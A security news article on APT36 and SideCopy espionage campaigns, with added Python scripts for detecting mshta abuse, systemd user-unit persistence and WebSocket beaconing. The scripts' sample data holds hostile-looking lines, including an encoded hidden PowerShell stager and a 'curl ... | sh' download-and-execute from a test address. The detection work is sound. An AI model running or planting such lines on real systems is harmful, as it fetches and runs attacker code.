SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers

Espionage Without Noise: Understanding APT36's Enduring Campaigns

Wed, 11th Feb 2026


Critical infrastructure around the world is under threat from well-organized, state-sponsored "espionage ecosystems". These loosely knit but well-resourced groups deploy a range of tooling aimed both at disrupting essential services and at gathering intelligence. Some launch distributed denial of service (DDoS) attacks against transport and communications hubs and against commercial supply chains. Others pursue geopolitical, military or economic advantage, mining for sensitive information and bypassing traditional security controls. Few sectors and few geographies fall outside their scope.

So, what does an espionage ecosystem look like and how does it operate? In this blog, we demonstrate a recent example.

For more than a decade, Indian government and defence organizations have operated under a constant digital shadow. Behind the scenes, a tightly connected espionage ecosystem - most notably Transparent Tribe (APT36) and the closely aligned SideCopy cluster - has continued to probe, adapt and persist. Individual campaigns come and go, but the underlying objective is unchanged: long-term intelligence collection through stealthy, resilient access, which is why the defence against it has to be equally sustained.

These actors are not flashy. They rely on proven tactics: spear-phishing, weaponized documents, and a mix of custom and off-the-shelf remote access trojans (RATs) to quietly embed themselves in target environments. Their tooling has nevertheless evolved steadily. Cross-platform payloads, memory-resident execution and increasingly covert command-and-control (C2) channels now form the backbone of an ecosystem built for patience rather than speed, and defenders have to keep pace with it.

A Surge in Activity: What We Observed

Over the past month, Aryaka Threat Research Labs observed multiple active campaigns targeting Indian defence and government-aligned organizations across both Windows and Linux environments. The three campaigns below illustrate how persistent, and how varied, the pressure on these organizations is.

Windows Campaign: GETA RAT via Living-Off-the-Land Abuse

One active campaign targeted Windows systems with phishing emails carrying LNK and HTA files. These ultimately deployed GETA RAT, a .NET-based remote access trojan frequently linked to the SideCopy cluster. The infection chain lives off the land: the HTA is run by the legitimate mshta.exe script host, the .NET payload is loaded via XAML deserialization, and it executes in memory rather than being dropped as a conventional executable, which sidesteps file-based detection. Defenders therefore need to watch process lineage and script-host behaviour, not just file hashes.

To achieve persistence, the attackers implemented layered startup mechanisms, so that access survived even if one stage of the infection chain was disrupted or cleaned up. The result is a lightweight but durable foothold, well suited to extended reconnaissance and intelligence gathering.
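The chain above (user opens a lure, explorer.exe spawns mshta.exe, the HTA hands off to an encoded PowerShell stager) is visible in ordinary process-creation telemetry even when nothing suspicious touches disk. The script below is an added example, not part of the original article and not Aryaka's detection content: it scores constructed Sysmon-style Event ID 1 records for the mshta.exe living-off-the-land pattern. All paths, filenames, the user "a" and the 203.0.113.10 address are invented.

```python
"""Flag mshta.exe living-off-the-land chains in process-creation telemetry.

Added example, not part of the original article and not Aryaka's detection
content. Records below are constructed to resemble Sysmon Event ID 1
(process creation) fields; every path, filename and address is invented.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


# Constructed sample telemetry (hypothetical user "a", RFC 5737 test address).
SAMPLE_EVENTS = [
    ProcEvent(1001, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    # User double-clicks a lure: explorer -> mshta with a double-extension .hta
    ProcEvent(1002, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r'"C:\Windows\System32\mshta.exe" C:\Users\a\Downloads\Tender_Notice.pdf.hta'),
    # Same host loading a remote HTA straight from a URL
    ProcEvent(1003, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r'"C:\Windows\System32\mshta.exe" http://203.0.113.10/update.hta'),
    # Script host hands off to an encoded PowerShell stager
    ProcEvent(1004, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    # Legitimate-looking local use from a system parent: should not be flagged
    ProcEvent(1005, r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\svchost.exe",
              r"mshta.exe C:\Windows\System32\oobe\setup.hta"),
]

# Parents that indicate a user opened something, rather than a system component.
USER_FACING_PARENTS = {"explorer.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children of mshta.exe that mean the HTA is doing more than rendering HTML.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> list:
    """Return the reasons an event looks like an mshta-based LotL chain (empty if none)."""
    reasons = []
    image, parent = basename(ev.image), basename(ev.parent_image)
    cmd = ev.command_line
    if image == "mshta.exe":
        if parent in USER_FACING_PARENTS:
            reasons.append(f"mshta.exe spawned by user-facing parent {parent}")
        if re.search(r"https?://", cmd, re.I):
            reasons.append("mshta.exe given a remote URL")
        if re.search(r"\\(Downloads|Temp|AppData)\\.*\.hta\b", cmd, re.I):
            reasons.append("HTA executed from a user-writable path")
        if re.search(r"\.(pdf|docx?|xlsx?|pptx?)\.hta\b", cmd, re.I):
            reasons.append("double extension on HTA filename")
    if parent == "mshta.exe" and image in SUSPICIOUS_CHILDREN:
        reasons.append(f"mshta.exe spawned {image}")
        if re.search(r"-e(nc|ncodedcommand)?\b", cmd, re.I):
            reasons.append("encoded PowerShell command line")
    return reasons


def find_suspicious(events=SAMPLE_EVENTS) -> dict:
    """Map pid -> reasons for every event that scored at least one reason."""
    return {ev.pid: r for ev in events if (r := score_event(ev))}


if __name__ == "__main__":
    for pid, reasons in find_suspicious().items():
        print(pid, "; ".join(reasons))
```

Run against the constructed records, it flags the three events of the chain (1002, 1003, 1004) and leaves the svchost-parented local HTA alone. The point is that none of the rules look at a hash: they key on who launched the script host, what it was asked to load, and what it spawned, which is what survives when the payload itself only ever exists in memory.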

Linux Campaign: ARES RAT and System-Level Persistence

In parallel, a separate campaign focused on Linux environments - an area where Transparent Tribe has shown growing maturity. This operation used a Go-based downloader to install ARES RAT, a Python-based remote access tool historically associated with APT36 activity.

Once deployed, ARES RAT performed automated system profiling, recursive file enumeration and structured data exfiltration. Persistence was achieved through user-level system services, which let the malware survive reboots while blending in with normal system activity (the likely candidate on modern distributions is a systemd user unit, which starts at the user's login and, if lingering is enabled for the account, at boot without any login). The campaign signals an intent to maintain parity across platforms rather than treating Linux as an afterthought.
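The "system user services" persistence is worth hunting for directly, because per-user units are rarely covered by host baselines that only enumerate /etc/systemd/system. The script below is an added example, not from the article or from Aryaka: it assumes the mechanism is systemd user units under ~/.config/systemd/user (an assumption; the article does not name the unit type) and that the payload is a Python script, as ARES RAT is. The unit files, the "analyst" account, the lingering state and the 203.0.113.10 address are all constructed.

```python
"""Audit systemd user units for RAT-style persistence.

Added example, not part of the original article. The article says ARES RAT
persisted through "system user services"; this script assumes that means
systemd user units under ~/.config/systemd/user (an assumption) and that the
payload is a Python script, as ARES RAT is. The unit texts, paths and address
below are constructed, not recovered samples.
"""
import re
from pathlib import PurePosixPath

# Constructed unit files keyed by path (hypothetical user "analyst").
SAMPLE_UNITS = {
    "/home/analyst/.config/systemd/user/dbus-broker.service": """\
[Unit]
Description=D-Bus User Message Bus
[Service]
ExecStart=/usr/bin/dbus-broker-launch --scope user
[Install]
WantedBy=default.target
""",
    "/home/analyst/.config/systemd/user/gvfs-sync.service": """\
[Unit]
Description=GVFS sync helper
[Service]
ExecStart=/usr/bin/python3 /home/analyst/.local/share/.cache/.sync/agent.py
Restart=always
RestartSec=30
[Install]
WantedBy=default.target
""",
    "/home/analyst/.config/systemd/user/updater.service": """\
[Service]
ExecStart=/bin/sh -c 'curl -fsSL http://203.0.113.10/u.sh | sh'
Restart=on-failure
[Install]
WantedBy=default.target
""",
}

# Accounts with `loginctl enable-linger`: their user units start at boot, no login needed.
# (Constructed; on a live host read the file names under /var/lib/systemd/linger/.)
LINGER_USERS = {"analyst"}

INTERPRETERS = {"python", "python3", "perl", "sh", "bash", "node"}
HIDDEN_DIR = re.compile(r"/\.[^/]+/")                      # a dot-directory inside the path
WRITABLE = re.compile(r"(^|\s)/(home|tmp|dev/shm|var/tmp)/")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def parse_unit(text: str) -> dict:
    """Minimal INI parser: returns {"Section.Key": value}; a repeated key keeps the last value."""
    section, data = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line and section:
            key, value = line.split("=", 1)
            data[f"{section}.{key.strip()}"] = value.strip()
    return data


def assess_unit(path: str, text: str, linger=LINGER_USERS) -> list:
    """Reasons this unit looks like malware persistence (empty list if none)."""
    unit = parse_unit(text)
    exec_start = unit.get("Service.ExecStart", "")
    argv = exec_start.split()
    reasons = []
    if argv and PurePosixPath(argv[0]).name in INTERPRETERS:
        reasons.append("ExecStart runs an interpreter")
    if HIDDEN_DIR.search(exec_start):
        reasons.append("payload lives under a hidden directory")
    if WRITABLE.search(exec_start):
        reasons.append("payload in a user-writable path")
    if PIPE_TO_SHELL.search(exec_start):
        reasons.append("download-and-execute pipeline")
    if unit.get("Service.Restart", "no") != "no":
        reasons.append(f"auto-restart ({unit['Service.Restart']})")
    parts = PurePosixPath(path).parts
    owner = parts[2] if len(parts) > 2 and parts[1] == "home" else None
    if reasons and owner in linger:
        reasons.append(f"lingering enabled for {owner}: survives reboot without a login")
    return reasons


def audit(units=SAMPLE_UNITS) -> dict:
    """Path -> reasons, for units that raised at least one reason."""
    return {p: r for p, t in units.items() if (r := assess_unit(p, t))}


if __name__ == "__main__":
    for path, reasons in audit().items():
        print(path, "->", "; ".join(reasons))
```

The lingering check is the caveat that matters operationally: a user unit on its own only runs while that user has a session, so a unit that is meant to survive reboots will usually be paired with `loginctl enable-linger`, and that linger file is a cheap, high-signal artefact to collect alongside the unit itself.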

An Emerging Tool: Desk RAT Enters the Stage

Beyond known malware families, Aryaka Threat Research Labs also observed campaigns delivering Desk RAT, a Go-based remote access trojan distributed via a malicious PowerPoint Add-In (PPAM). A new family on an uncommon delivery vector is a reminder that detection content keyed to known tools and file types needs regular refreshing.

Desk RAT stands out for its emphasis on host telemetry and real-time monitoring. It collects detailed system diagnostics and talks to its operators over WebSocket-based command-and-control, exchanging structured heartbeat and client-information messages. Regular heartbeats give the operators continuous situational awareness on compromised hosts, consistent with APT36's long-term surveillance objectives; they also give defenders a cadence to look for.
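A heartbeat channel has two properties an analyst can measure without knowing the malware: the frames arrive on a near-fixed clock, and they carry the same structure every time. The script below is an added example, not part of the article and not derived from Desk RAT samples. It assumes a sensor that can see WebSocket text frames (for example a TLS-terminating proxy) and logs them as (flow id, epoch seconds, payload); the frames themselves are constructed, with flow "A" imitating a 30-second heartbeat with a fixed JSON key set and flow "B" imitating an interactive chat application.

```python
"""Spot heartbeat-style WebSocket C2 from frame timing and message shape.

Added example, not part of the original article and not derived from Desk RAT
samples. It assumes a sensor that can see WebSocket text frames (for example a
TLS-terminating proxy) and logs (flow id, epoch seconds, payload). The frames
below are constructed: flow "A" imitates a 30-second heartbeat with a fixed
JSON schema, flow "B" imitates an interactive chat application.
"""
import json
import statistics
from collections import defaultdict
from typing import Optional

T0 = 1_700_000_000.0  # arbitrary epoch base for the constructed capture

SAMPLE_FRAMES = [
    # Flow A: 8 frames, ~30 s apart with a few tenths of a second of jitter, identical key set.
    *[("A", T0 + 30 * i + (0.4 if i % 2 else -0.3),
       json.dumps({"type": "heartbeat", "id": "HOST-7F3A", "uptime": 3600 + 30 * i}))
      for i in range(8)],
    # Flow B: human-driven traffic, irregular timing, mixed message shapes.
    ("B", T0 + 0.0, '{"msg":"hi","room":"ops"}'),
    ("B", T0 + 2.5, '{"msg":"did the build finish?","room":"ops"}'),
    ("B", T0 + 49.0, '{"typing":true}'),
    ("B", T0 + 50.1, '{"msg":"yes, 10 min ago","room":"ops"}'),
    ("B", T0 + 180.0, '{"msg":"ok thanks","room":"ops"}'),
    ("B", T0 + 181.2, '{"reaction":"+1","ref":4}'),
]

MAX_CV = 0.15           # coefficient of variation of inter-frame gaps: lower = more clock-like
MIN_SCHEMA_RATIO = 0.9  # share of frames carrying the flow's most common JSON key set
MIN_FRAMES = 5          # below this, timing statistics are not meaningful


def message_shape(text: str) -> tuple:
    """Reduce a frame to its JSON key set so repeated structured messages collapse together."""
    try:
        obj = json.loads(text)
    except json.JSONDecodeError:
        return ("<non-json>",)
    return tuple(sorted(obj)) if isinstance(obj, dict) else ("<non-object>",)


def analyse_flow(frames: list) -> Optional[dict]:
    """Timing and schema statistics for one flow; None if there are too few frames to judge."""
    if len(frames) < MIN_FRAMES:
        return None
    ts = sorted(t for t, _ in frames)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.fmean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
    shapes = [message_shape(text) for _, text in frames]
    modal = max(set(shapes), key=shapes.count)
    ratio = shapes.count(modal) / len(shapes)
    return {
        "frames": len(frames),
        "mean_gap_s": round(mean, 2),
        "cv": round(cv, 3),
        "modal_keys": modal,
        "schema_ratio": round(ratio, 2),
        "beacon_like": cv < MAX_CV and ratio >= MIN_SCHEMA_RATIO,
    }


def find_beacons(frames=SAMPLE_FRAMES) -> dict:
    """Group frames by flow id and score each flow."""
    by_flow = defaultdict(list)
    for flow, t, text in frames:
        by_flow[flow].append((t, text))
    return {flow: analyse_flow(f) for flow, f in by_flow.items()}


if __name__ == "__main__":
    for flow, stats in find_beacons().items():
        print(flow, stats)
```

Flow A scores a coefficient of variation near 0.02 with every frame sharing the key set (id, type, uptime) and is reported as beacon-like; flow B has a CV above 1 and a mixed schema and is not. The thresholds are starting points, not tuned values: a RAT that adds jitter will push the CV up, so in practice this is paired with longer observation windows and with the destination's reputation rather than used on its own.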

The Bigger Picture

Taken together, these campaigns reinforce a familiar but evolving narrative. Transparent Tribe and SideCopy are not reinventing espionage - they are refining it. By expanding cross-platform coverage, leaning into memory-resident techniques, and experimenting with new delivery vectors, this ecosystem continues to operate below the noise floor while maintaining strategic focus.

For defenders, the takeaway is clear: these are not isolated incidents but coordinated efforts within a mature threat ecosystem. Detecting and disrupting such actors requires visibility across platforms, attention to subtle behavioural signals, and the recognition that the attacker's greatest weapon is persistence, not speed.

Cyber Espionage is a Global Challenge

Cyber espionage is a global challenge, and many nation-states face it. Over the past two years, numerous countries have been targeted by sophisticated nation-state espionage operations, driven primarily by Chinese, Russian and Iranian APT groups. China-linked actors such as UNC6384 / Mustang Panda and APT31 (Judgement Panda / Zirconium) have run sustained phishing campaigns against diplomatic and government institutions, delivering remote access tools such as PlugX, Gh0stRAT derivatives such as SugarGh0st, and related tooling such as SpiceRAT, which provide stealthy persistence, command execution and exfiltration of sensitive data.

At the same time, Russian state-aligned groups, most prominently Sandworm (APT44, tracked by Microsoft as Seashell Blizzard), have deployed backdoor loaders and RATs, notably DarkCrystal RAT (DCRat), via trojanized tools and fake software-activation utilities to maintain covert footholds in Ukrainian, EU and UK-linked networks, giving them remote control and credential theft. Detection is complicated by the use of legitimate-looking tools and obfuscation. CERT-EU reporting covers these campaigns alongside other sustained efforts, such as the BadPilot initial-access operations, whose purpose is to secure prolonged access for espionage. The published indicators of compromise are the usual mix of network destinations, file hashes and anomalous account activity; security teams should ingest them, but behaviour-based detection is what catches the next variant.

These multi-vector intrusions show that modern nation-state cyber espionage across these regions draws on a wide array of RAT families and mature TTPs, such as spear-phishing, trojanized tools and lateral movement, to achieve persistence, evade detection and gather strategic intelligence.